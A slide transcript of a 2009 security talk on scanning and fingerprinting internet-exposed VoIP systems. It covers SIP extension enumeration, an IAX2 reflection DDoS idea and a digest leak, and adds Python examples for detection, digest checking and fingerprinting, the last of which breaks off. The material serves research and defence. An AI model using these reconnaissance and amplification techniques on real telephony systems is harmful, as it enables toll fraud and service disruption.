ENABLESECURITY




        Scanning the Intertubes for VOIP
                 Telephony exposed on the ‘net




                                             Confidence 2009




                      whoami

          • EnableSecurity
          • 9 years old
          • SIPVicious and VOIPPACK (for CANVAS)
          • Surfjack, Extended HTML Form attack





                 next few minutes

          • Brief intro to how VoIP is being abused
          • Scanning for VoIP systems
          • How to fingerprint VoIP systems
          • Possibilities for abuse





                    VoIP Scanning

          • SIP
          • IAX2
          • H.323
          • SCCP





                 A primer on SIP

          • Text based just like HTTP
          • UDP port 5060
          • INVITE gets things to buzz and ring
          • REGISTER sends phone calls your way
          • OPTIONS gives you supported options




                 A primer on IAX2

          • Binary protocol running on port 4569
          • POKE is like ping
          • PONG is like er.. pong
          • REGREQ is like REGISTER
          • REGREJ stands for registration rejected




            VoIP and Cybercrime

          • Scans for SIP are on the rise
          • News of fraud
          • What is happening in the background?
          • What tools are they using?





                                   Scans
 OPTIONS sip:2658@195.159.X.X SIP/2.0
 Via: SIP/2.0/UDP 0.0.0.0:1498;branch=BCEA2F83-1CEF-FC6A-2989-54C18CE6425E;rport
 Max-Forwards: 70
 To: <sip:2658@195.159.X.X>
 From: <sip:8571@195.159.X.X>;tag=723535DC-E71F-E3D4-D572-2B41E58782E8
 Call-ID: 4203F1B5-3E1F-E6D6-32FF-B8C2DFAA190F
 CSeq: 1 OPTIONS
 Contact: <sip:@0.0.0.0:1498;transport=udp>
 Accept: application/sdp
 Content-Length: 0








                      Honeypot


          • Some python code put together
          • Replies to requests and acts like a registrar






                 demo






                   SIP Scanning

          • OPTIONS is ideal for this
          • REGISTER adds value :-)
           • Tell between a registrar and an endpoint





                   OPTIONS scan

          scanner  ---- OPTIONS ---->  SIP Registrar
          scanner  <---- 200 OK -----  SIP Registrar








                   Scanning IAX2

          scanner  ---- POKE ---->  Asterisk Box
          scanner  <---- PONG ----  Asterisk Box








                 Headers of interest
          SIP/2.0 404 Not found
          Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061
          From: "test" <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c
          To: "test" <sip:100@1.2.3.4:5060>;tag=as05610bff
          Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d
          CSeq: 1 REGISTER
          User-Agent: Asterisk PBX
          Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
          Content-Length: 0








             Modified User-agent
          SIP/2.0 404 Not found
          Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061
          From: "test" <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c
          To: "test" <sip:100@1.2.3.4:5060>;tag=as05610bff
          Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d
          CSeq: 1 REGISTER
          User-Agent: MyVeryOwn PBX
          Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
          Content-Length: 0








                             Give away
          SIP/2.0 404 Not found
          Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061
          From: "test" <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c
          To: "test" <sip:100@1.2.3.4:5060>;tag=as05610bff
          Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d
          CSeq: 1 REGISTER
          User-Agent: MyVeryOwn PBX
          Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
          Content-Length: 0








             Fingerprinting To Tag

         Sipura / Linksys SPA     [a-fA-F0-9]{16}i0
         Cisco VoIP Gateway       [a-fA-F0-9]{6,8}-[a-fA-F0-9]{2,4}
         AVM FRITZ!Box            [a-fA-F0-9]{16,29}







                 Order of headers
 SIP/2.0 200 OK
 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9
 From: "hello" <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14
 To: "hello" <sip:100@1.2.3.35:5060>;tag=as00ea0c68
 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
 CSeq: 1 OPTIONS
 User-Agent: xxx voicemail
 Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
 Contact: <sip:1.2.3.35>
 Accept: application/sdp
 Content-Length: 0








                 Order of headers
 SIP/2.0 404 Not Found
 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-59202;received=3.2.1.9;rport=5061
 From: "hello" <sip:100@1.2.3.138:5060>;tag=d90a4f8a13c4d8bf89f5
 To: "hello" <sip:100@1.2.3.138:5060>;tag=as263e3393
 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
 CSeq: 1 OPTIONS
 User-Agent: xxx asterisk
 Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
 Supported: replaces
 Accept: application/sdp
 Content-Length: 0








                   Order of headers
(left)
SIP/2.0 200 OK
Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9
From: "hello" <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14
To: "hello" <sip:100@1.2.3.35:5060>;tag=as00ea0c68
Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
CSeq: 1 OPTIONS
User-Agent: sipgate voicemail
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Contact: <sip:1.2.3.35>
Accept: application/sdp
Content-Length: 0

(right)
SIP/2.0 404 Not Found
Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-59202;received=3.2.1.9;rport=5061
From: "hello" <sip:100@1.2.3.138:5060>;tag=d90a4f8a13c4d8bf89f5
To: "hello" <sip:100@1.2.3.138:5060>;tag=as263e3393
Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
CSeq: 1 OPTIONS
User-Agent: sipbox asterisk
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Accept: application/sdp
Content-Length: 0








                   Order of headers
(left)
SIP/2.0 200 OK
Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9
From: "hello" <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14
To: "hello" <sip:100@1.2.3.35:5060>;tag=as00ea0c68
Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
CSeq: 1 OPTIONS
User-Agent: sipgate voicemail
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Contact: <sip:1.2.3.35>
Accept: application/sdp
Content-Length: 0

(right, cut off at the slide's edge)
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-
From: "hello" <sip:100@1.2.3.40:5060>;tag=d90
To: "hello" <sip:100@1.2.3.40:5060>;tag=cfbe3
Cseq: 1 REGISTER
Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
WWW-Authenticate: Digest realm="sipgate.at",
Content-Length: 0








          Case for header names
(left)
SIP/2.0 200 OK
Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9
From: "hello" <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14
To: "hello" <sip:100@1.2.3.35:5060>;tag=as00ea0c68
Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
CSeq: 1 OPTIONS
User-Agent: sipgate voicemail
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Contact: <sip:1.2.3.35>
Accept: application/sdp
Content-Length: 0

(right, cut off at the slide's edge; note "Cseq" and "Call-id" versus "CSeq" and "Call-ID")
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-
From: "hello" <sip:100@1.2.3.40:5060>;tag=d90
To: "hello" <sip:100@1.2.3.40:5060>;tag=cfbe3
Cseq: 1 REGISTER
Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
WWW-Authenticate: Digest realm="sipgate.at",
Content-Length: 0








                  Fingerprinting

          • Just one packet needed
          • To tag
          • Headers
          • Community effort





                 Community effort

          • SIPVicious 0.2.3
          • Included svlearnfp.py
          • Generated regular expressions for To tags
          • Generated hashes describing headers
          • SIPVicious 2.0 ...




                 Interesting facts

          • Random scans work pretty well
          • ADSL routers etc.: FRITZ!Box, Speedtouch
          • Asterisk
          • Cisco Gateways





                 demo






          Introducing REGISTER

          • Binds an extension to an IP and port
          • Normally requires authentication
          • If no password is set it binds without auth





           More interesting facts

          • The REGISTER scan
           • Dangerous
           • Useful for cheap honeypots :-)




             Enumeration of extensions

          • Response to a REGISTER for a non-existent extension
          • A different response indicates that the extension exists
          • If the extension has no password it sends a 200 OK
          • Otherwise asks for authentication




                  scanner                          * (Asterisk)
                  REGISTER 100  ------------------>
                  REGISTER 101  ------------------>
                  REGISTER 102  ------------------>





                  scanner                          * (Asterisk)
                  <------------------  404 Not found
                  <------------------  200 OK
                  <------------------  401 Auth required








                 demo






                 DDoS using IAX2?

                 Build-up as drawn on the slides (* = an Asterisk box):

                 1. Ordinary failed registration:

                    :-)   ---- REGREQ ---->   *
                    :-)   <---- ACK -------   *
                    :-)   <---- REGREJ ----   *
                    :-)   ---- ACK ------->   *

                 2. The REGREJ is never ACKed, so it keeps being retransmitted:

                    }:-)  ---- REGREQ ---->   *
                    }:-)  <---- ACK -------   *
                    }:-)  <---- REGREJ ----   *
                    }:-)  <---- REGREJ ----   *
                    }:-)  <---- REGREJ ----   *

                 3. The REGREQ is sent by }:-) but the replies land on :-/ :

                    }:-)  ---- REGREQ ---->   *
                    :-/   <---- ACK -------   *
                    :-/   <---- REGREJ ----   *
                    :-/   <---- REGREJ ----   *
                    :-/   <---- REGREJ ----   *

                 4. With many Asterisk boxes answering }:-)'s REGREQs:

                    :-o   <---- REGREJ, REGREJ, REGREJ ...   ** ** ** ** *
                    :'-(                                     }:-)
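An added example (not the slides' own code) that makes the IAX2 exchange on this slide concrete from a monitoring point of view: it decodes IAX2 full frames, with the layout and IAX control subclass numbers taken from RFC 5456, and counts REGREJ frames that the receiver never acknowledges, which is the retransmission pattern the slide draws. The capture, addresses and call numbers are constructed for the example.

```python
import struct
from collections import Counter

# Full-frame layout and IAX control subclass numbers as in RFC 5456 (IAX2).
IAX_CONTROL = 0x06
SUBCLASS = {0x02: "PING", 0x03: "PONG", 0x04: "ACK", 0x0d: "REGREQ", 0x0e: "REGAUTH",
            0x0f: "REGACK", 0x10: "REGREJ", 0x1e: "POKE"}
IE_USERNAME, IE_REFRESH, IE_CAUSE = 0x06, 0x13, 0x16


def build_full_frame(src_call, dst_call, timestamp, oseq, iseq, subclass, ies=()):
    """Encode a full frame (F bit set) carrying an IAX control message."""
    header = struct.pack("!HHIBBBB", 0x8000 | src_call, dst_call, timestamp,
                         oseq, iseq, IAX_CONTROL, subclass)
    body = b"".join(struct.pack("!BB", ie, len(data)) + data for ie, data in ies)
    return header + body


def parse_full_frame(packet):
    """Decode a full frame into its fields and information elements."""
    if len(packet) < 12:
        raise ValueError("too short for a full frame")
    scall, dcall, ts, oseq, iseq, ftype, sub = struct.unpack("!HHIBBBB", packet[:12])
    if not scall & 0x8000:
        raise ValueError("F bit clear: a mini (media) frame, not a full frame")
    ies, pos = {}, 12
    while pos + 2 <= len(packet):
        ie_id, length = packet[pos], packet[pos + 1]
        ies[ie_id] = packet[pos + 2:pos + 2 + length]
        pos += 2 + length
    name = SUBCLASS.get(sub & 0x7f, f"0x{sub:02x}") if ftype == IAX_CONTROL else None
    return {"src_call": scall & 0x7fff, "dst_call": dcall & 0x7fff, "timestamp": ts,
            "oseq": oseq, "iseq": iseq, "type": ftype, "subclass": name, "ies": ies}


def unacked_regrej(packets, threshold=3):
    """REGREJ frames per (server, receiver) pair that the receiver never ACKed.

    `packets` is a list of (src_ip, dst_ip, frame_bytes). A server keeps
    retransmitting REGREJ until it is ACKed; when the REGREQ carried someone
    else's source address, that someone never ACKs and just absorbs the
    retransmissions. Pairs with at least `threshold` outstanding REGREJs are
    returned, which is what a monitor on either side would alert on.
    """
    pending = Counter()
    for src, dst, raw in packets:
        try:
            frame = parse_full_frame(raw)
        except ValueError:
            continue  # media or truncated frames are irrelevant here
        if frame["subclass"] == "REGREJ":
            pending[(src, dst)] += 1
        elif frame["subclass"] == "ACK":
            pending.pop((dst, src), None)  # receiver acknowledged the server
    return {pair: n for pair, n in pending.items() if n >= threshold}


# Constructed capture for the slide's scenario (documentation addresses).
SERVER, VICTIM, PHONE = "192.0.2.10", "192.0.2.20", "192.0.2.30"
REGREQ = build_full_frame(1, 0, 0, 0, 0, 0x0d,
                          [(IE_USERNAME, b"100"), (IE_REFRESH, struct.pack("!H", 60))])
REGREJ = build_full_frame(2, 1, 5, 0, 1, 0x10, [(IE_CAUSE, b"Registration Refused")])
ACK = build_full_frame(1, 2, 5, 1, 1, 0x04)
CAPTURE = [
    (VICTIM, SERVER, REGREQ),   # arrives bearing VICTIM's address; VICTIM never sent it
    (SERVER, VICTIM, REGREJ), (SERVER, VICTIM, REGREJ), (SERVER, VICTIM, REGREJ),
    (PHONE, SERVER, REGREQ),    # a real phone that is also refused ...
    (SERVER, PHONE, REGREJ), (PHONE, SERVER, ACK),   # ... but ACKs, so no retransmits
]
```

`unacked_regrej(CAPTURE)` flags only the SERVER to VICTIM pair; the legitimately refused PHONE is cleared by its ACK.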




                 SIP Digest Auth

          • REGISTER usually gets a 401 Unauthorized
          • INVITE gets a 407 Proxy Authentication Required
          • Challenge response mechanism
           • Takes various properties + password
           • Nonce, Method, URI
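An added walk-through, not from the slides, of the challenge-response the slide describes, seen from the registrar's side: the response is MD5 over the user's HA1, the nonce and MD5(method:uri), so it is tied to one nonce and one method/URI, and a replay or a different method fails verification. The realm, nonce, user and secret are constructed placeholders, and the function names are mine.

```python
import hashlib
import hmac
import re


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 digest without qop: MD5(HA1 : nonce : HA2), where
    HA1 = MD5(user:realm:password) and HA2 = MD5(method:uri)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def build_authorization(username, realm, password, method, uri, nonce):
    """What a phone puts in Authorization after a 401 (Proxy-Authorization after a 407)."""
    response = digest_response(username, realm, password, method, uri, nonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{response}", algorithm=MD5')


def parse_digest_header(value):
    """Turn 'Digest k="v", k2=v2, ...' into a dict, quotes stripped."""
    scheme, _, params = value.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest credential")
    pairs = re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params)
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3) for m in pairs}


def verify_authorization(auth_header, method, passwords, issued_nonces):
    """Registrar-side check of a credential header.

    `passwords` maps username -> password (a real registrar would store HA1
    instead); `issued_nonces` holds nonces this registrar handed out and has
    not consumed yet. Returns (accepted, reason); the reason is for the log,
    the SIP reply should not differ between the failure cases.
    """
    params = parse_digest_header(auth_header)
    for key in ("username", "realm", "nonce", "uri", "response"):
        if key not in params:
            return False, f"missing {key}"
    if params["nonce"] not in issued_nonces:
        return False, "unknown or reused nonce"
    password = passwords.get(params["username"])
    if password is None:
        return False, "unknown user"
    expected = digest_response(params["username"], params["realm"], password,
                               method, params["uri"], params["nonce"])
    if not hmac.compare_digest(expected, params["response"]):  # constant-time
        return False, "bad response"
    issued_nonces.discard(params["nonce"])  # one-shot nonce: a replay now fails
    return True, "ok"


# Constructed values for the walk-through: realm, nonce, user and secret are placeholders.
REALM, NONCE, USER, SECRET = "pbx.example.invalid", "5f1c3a9e", "100", "constructed-secret"
AUTH = build_authorization(USER, REALM, SECRET, "REGISTER", f"sip:{REALM}", NONCE)
```

`verify_authorization(AUTH, "REGISTER", {USER: SECRET}, {NONCE})` accepts once; the same header presented again, or checked against method INVITE, is refused.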




                 Digest Leak

                    INVITE

                    200 OK








                 Digest Leak

                     BYE


                    407 Challenge








                 demo






            Vulnerable endpoints

          • X-lite
          • Gizmo5
          • Zoiper





            Vulnerable endpoints

          • Cisco 7940
          • Grandstream GXP*
          • Patton Smartlink
          • Linksys SPA942
          • Fritzbox




                          But ...

          • There’s no SIP Phones on the ‘net!
          • There are ;-)
          • The ‘net is full of Fritzbox
          • Internal endpoints behind NAT





                      More at..

          • EnableSecurity.com/research
          • Sipvicious.org
          • VOIPSA.org





                    Shoutouts!


          • Sjur at usken.no
          • dudes from .mt =)






                 Q.A






                 sandro@enablesecurity.com





Web Application Firewalls  Detection, Bypassing And ExploitationWeb Application Firewalls  Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Sandro Gauci
 

Mehr von Sandro Gauci (9)

CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
 
TADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downTADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform down
 
The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro GauciThe OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
The OpenSIPS security audit - OpenSIPS Summit - Sandro Gauci
 
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverTools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC edition
 
The various ways your RTC may be crushed
The various ways your RTC may be crushedThe various ways your RTC may be crushed
The various ways your RTC may be crushed
 
A tale of two RTC fuzzing approaches
A tale of two RTC fuzzing approachesA tale of two RTC fuzzing approaches
A tale of two RTC fuzzing approaches
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls  Detection, Bypassing And ExploitationWeb Application Firewalls  Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
 

Scanning The Intertubes For VoIP (slide transcript)

  • 1. ENABLESECURITY: Scanning the Intertubes for VOIP. Telephony exposed on the 'net. Confidence 2009

  • 2. whoami
    • EnableSecurity
    • 9 years old
    • SIPVicious and VOIPPACK (for CANVAS)
    • Surfjack, Extended HTML Form attack

  • 3. next few minutes
    • Brief intro to how VoIP is being abused
    • Scanning for VoIP systems
    • How to fingerprint VoIP systems
    • Possibilities for abuse

  • 4. VoIP Scanning
    • SIP
    • IAX2
    • H.323
    • SCCP

  • 5. A primer on SIP
    • Text based just like HTTP
    • UDP port 5060
    • INVITE gets things to buzz and ring
    • REGISTER sends phone calls your way
    • OPTIONS gives you supported options

  • 6. A primer on IAX2
    • Binary protocol running on port 4569
    • POKE is like ping
    • PONG is like er.. pong
    • REGREQ is like REGISTER
    • REGREJ stands for registration rejected

  • 7. VoIP and Cybercrime
    • Scans for SIP are on the rise
    • News of fraud
    • What is happening in the background?
    • What tools are they using?

  • 8. Scans
      OPTIONS sip:2658@195.159.X.X SIP/2.0
      Via: SIP/2.0/UDP 0.0.0.0:1498;branch=BCEA2F83-1CEF-FC6A-2989-54C18CE6425E;rport
      Max-Forwards: 70
      To: <sip:2658@195.159.X.X>
      From: <sip:8571@195.159.X.X>;tag=723535DC-E71F-E3D4-D572-2B41E58782E8
      Call-ID: 4203F1B5-3E1F-E6D6-32FF-B8C2DFAA190F
      CSeq: 1 OPTIONS
      Contact: <sip:@0.0.0.0:1498;transport=udp>
      Accept: application/sdp
      Content-Length: 0

  • 9. Honeypot
    • Some python code put together
    • Replies to requests and acts like a registrar

  • 10. demo

  • 11. SIP Scanning
    • OPTIONS is ideal for this
    • REGISTER adds value :-)
    • Tell between a registrar and an endpoint

  • 12. OPTIONS scan
    [diagram: the SIP scanner sends OPTIONS to a registrar, which answers 200 OK]

  • 13. (image-only slide)

  • 14. Scanning IAX2
    [diagram: the scanner sends POKE to an Asterisk box, which answers PONG]

  • 15. (image-only slide)

  • 16. Headers of interest
      SIP/2.0 404 Not found
      Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061
      From: "test" <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c
      To: "test" <sip:100@1.2.3.4:5060>;tag=as05610bff
      Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d
      CSeq: 1 REGISTER
      User-Agent: Asterisk PBX
      Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
      Content-Length: 0

  • 17. Modified User-agent
      SIP/2.0 404 Not found
      Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061
      From: "test" <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c
      To: "test" <sip:100@1.2.3.4:5060>;tag=as05610bff
      Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d
      CSeq: 1 REGISTER
      User-Agent: MyVeryOwn PBX
      Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
      Content-Length: 0

  • 18. Give away (same response as slide 17)

  • 19. Give away (same response as slide 17)

  • 20. Fingerprinting: To tag
      Device                  To tag pattern
      Sipura / Linksys SPA    [a-fA-F0-9]{16}i0
      Cisco VoIP Gateway      [a-fA-F0-9]{6,8}-[a-fA-F0-9]{2,4}
      AVM FRITZ!Box           [a-fA-F0-9]{16,29}

  • 21. Order of headers
      SIP/2.0 200 OK
      Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9
      From: "hello" <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14
      To: "hello" <sip:100@1.2.3.35:5060>;tag=as00ea0c68
      Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
      CSeq: 1 OPTIONS
      User-Agent: xxx voicemail
      Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
      Contact: <sip:1.2.3.35>
      Accept: application/sdp
      Content-Length: 0

  • 22. Order of headers
      SIP/2.0 404 Not Found
      Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-59202;received=3.2.1.9;rport=5061
      From: "hello" <sip:100@1.2.3.138:5060>;tag=d90a4f8a13c4d8bf89f5
      To: "hello" <sip:100@1.2.3.138:5060>;tag=as263e3393
      Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
      CSeq: 1 OPTIONS
      User-Agent: xxx asterisk
      Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
      Supported: replaces
      Accept: application/sdp
      Content-Length: 0

  • 23. Order of headers (the two responses above side by side; same messages, User-Agent now unredacted)
    Left:
      SIP/2.0 200 OK
      Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9
      From: "hello" <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14
      To: "hello" <sip:100@1.2.3.35:5060>;tag=as00ea0c68
      Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
      CSeq: 1 OPTIONS
      User-Agent: sipgate voicemail
      Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
      Contact: <sip:1.2.3.35>
      Accept: application/sdp
      Content-Length: 0
    Right:
      SIP/2.0 404 Not Found
      Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-59202;received=3.2.1.9;rport=5061
      From: "hello" <sip:100@1.2.3.138:5060>;tag=d90a4f8a13c4d8bf89f5
      To: "hello" <sip:100@1.2.3.138:5060>;tag=as263e3393
      Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
      CSeq: 1 OPTIONS
      User-Agent: sipbox asterisk
      Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
      Supported: replaces
      Accept: application/sdp
      Content-Length: 0

  • 24. Order of headers (the sipgate voicemail 200 OK of slide 23 on the left; on the right a registrar's reply to REGISTER, values cut off at the slide's right edge)
    Right:
      SIP/2.0 401 Unauthorized
      Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-
      From: "hello" <sip:100@1.2.3.40:5060>;tag=d90
      To: "hello" <sip:100@1.2.3.40:5060>;tag=cfbe3
      Cseq: 1 REGISTER
      Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663
      WWW-Authenticate: Digest realm="sipgate.at",
      Content-Length: 0

  • 25. Case for header names (same pair as slide 24: "CSeq" and "Call-ID" on the left, "Cseq" and "Call-id" on the right)

  • 26. Fingerprinting
    • Just one packet needed
    • To tag
    • Headers
    • Community effort

  • 27. Community effort
    • SIPVicious 0.2.3
    • Included svlearnfp.py
    • Generated regular expressions for to tags
    • Generated hashes describing headers
    • SIPVicious 2.0 ...

  • 28. Interesting facts
    • Random scans work pretty well
    • ADSL etc FRITZ!Box, Speedtouch
    • Asterisk
    • Cisco Gateways

  • 29. demo

  • 30. Introducing REGISTER
    • Binds an extension to an IP and port
    • Normally requires authentication
    • If no password is set it binds without auth

  • 31. More interesting facts
    • The REGISTER scan
    • Dangerous
    • Useful for cheap honeypots :-)

  • 32. Enumeration of extensions
    • Response to a REGISTER for non-existent extension
    • A different response indicates that the extension exists
    • If the extension has no password it sends a 200 OK
    • Otherwise asks for authentication

  • 33. [diagram: the scanner sends REGISTER for extensions 100, 101 and 102 to an Asterisk box (*)]

  • 34. [diagram: the replies differ per extension: 404 Not found, 200 OK, 401 Auth required]
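Slides 16 to 34 in code, as an added example that is neither the slides' own material nor SIPVicious: it parses a SIP response while keeping header names in the order and case the stack wrote them (the signal of slides 21 to 25), matches the To tag against the patterns from slide 20, and applies the REGISTER-response rule of slide 32 to classify an extension. Assumptions: the Asterisk To-tag pattern (the letters "as" followed by eight hex digits) is read off the sample replies on these slides rather than the table; the 401 sample is constructed, with a made-up tag and nonce; the header hash is a SHA-1 over header names chosen here, not the hash format svlearnfp.py produces.

```python
import hashlib
import re

# Added example, not SIPVicious code: SIP response parser, the two
# fingerprinting signals from slides 16-27 (To tag shape, header names in
# their original order and case) and the REGISTER rule from slide 32.

# To-tag patterns from the table on slide 20, anchored to the whole tag.
# The Asterisk entry is not on that table; it is taken from the "tag=as..."
# replies shown on slides 16-24 (letters "as" plus eight hex digits).
TO_TAG_PATTERNS = [
    ("Asterisk PBX", re.compile(r"^as[a-fA-F0-9]{8}$")),
    ("Sipura / Linksys SPA", re.compile(r"^[a-fA-F0-9]{16}i0$")),
    ("Cisco VoIP Gateway", re.compile(r"^[a-fA-F0-9]{6,8}-[a-fA-F0-9]{2,4}$")),
    ("AVM FRITZ!Box", re.compile(r"^[a-fA-F0-9]{16,29}$")),
]


def parse_response(raw):
    """Return (status_code, [(header_name, value), ...]) keeping the order
    and spelling of header names exactly as the remote stack wrote them."""
    lines = raw.replace("\r\n", "\n").lstrip("\n").split("\n")
    m = re.match(r"SIP/2\.0 (\d{3})", lines[0])
    if not m:
        raise ValueError("not a SIP response: %r" % lines[0])
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break                      # blank line ends the headers
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers.append((name.strip(), value.strip()))
    return int(m.group(1)), headers


def header(headers, name):
    """Case-insensitive lookup, as RFC 3261 requires of a receiver."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def to_tag(headers):
    m = re.search(r";tag=([^;\s]+)", header(headers, "To") or "")
    return m.group(1) if m else None


def match_to_tag(tag):
    for device, pattern in TO_TAG_PATTERNS:
        if tag and pattern.match(tag):
            return device
    return None


def header_fingerprint(headers):
    """Hash over header names as written, in order. 'CSeq' before 'Call-ID'
    versus 'Cseq' after 'Call-id' (slides 24-25) gives different hashes."""
    names = "\n".join(n for n, _ in headers)
    return hashlib.sha1(names.encode()).hexdigest()[:12]


def fingerprint(raw):
    code, headers = parse_response(raw)
    tag = to_tag(headers)
    return {"status": code, "user_agent": header(headers, "User-Agent"),
            "to_tag": tag, "to_tag_match": match_to_tag(tag),
            "header_hash": header_fingerprint(headers)}


def classify_register(raw):
    """Slide 32: 404 -> extension unknown; 200 -> exists, no password;
    401 (or 407) -> exists, authentication required."""
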